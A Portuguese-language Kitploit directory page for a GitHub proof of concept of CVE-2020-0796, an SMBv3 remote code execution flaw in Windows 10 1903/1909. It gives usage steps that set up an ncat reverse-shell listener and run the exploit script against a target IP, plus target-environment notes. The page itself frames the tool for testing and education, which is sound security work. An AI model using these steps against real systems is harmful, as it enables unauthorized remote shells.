Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-0796 — PoC de Execução Remota de Código para CVE-2020-0796 | Kitploit
Ferramentas/GitHubGitHub/orangmuda/cve-2020-0796
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHuborangmuda/cve-2020-0796

CVE-2020-0796

PoC de Execução Remota de Código para CVE-2020-0796

Ver Repositório
513há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Uso

  • Certifique-se de que Python e ncat estão instalados.

  • Execute calc_target_offsets.bat no computador de destino e ajuste os offsets no topo do arquivo SMBleedingGhost.py de acordo com a saída do script (veja também a nota abaixo).

  • Execute ncat com os seguintes argumentos de linha de comando:

    ncat -lvp <port>

    Onde <port> é o número da porta em que o ncat estará escutando.

  • Execute SMBleedingGhost.py com os seguintes argumentos de linha de comando:

    SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

    Onde <target_ip> é o endereço IP do computador de destino vulnerável. <reverse_shell_ip> e são o endereço IP e o número da porta em que o está escutando.

<reverse_shell_port>
ncat
  • Se tudo correr bem, o ncat exibirá um shell que fornece acesso ao sistema no computador de destino.

  • Nota: Você deve estar se perguntando por que é necessário executar o script calc_target_offsets.bat no computador de destino, e se isso não anula o propósito de a execução remota de código ser remota. Esses offsets não são aleatórios e são os mesmos em todas as instâncias de uma mesma versão do Windows. Seria possível tornar o ataque mais universal detectando a versão do Windows de destino e ajustando os offsets automaticamente, ou não dependendo deles por completo, mas é apenas uma prova de conceito (POC) e fizemos o que era mais simples. Também consideramos positivo o fato de a POC não ser universal e não ser conveniente para usos além de testes e educação.

    demo

    Ambiente de Destino

    As versões 1903 e 1909 do Windows 10 são afetadas. Versões não corrigidas do Windows 10 1903 não são suportadas devido a um bug de desreferência nula no Windows (corrigido no KB4512941).

    Devido à natureza da exploração, a POC funciona melhor em alvos que executam em um computador (ou VM) com um único processador lógico. Alvos com mais de um processador lógico executando no VirtualBox também devem ser suportados, mas a POC é menos confiável nesse caso. Outros alvos podem não ser suportados. Para detalhes, consulte nosso artigo técnico abaixo.

    Baixar ferramenta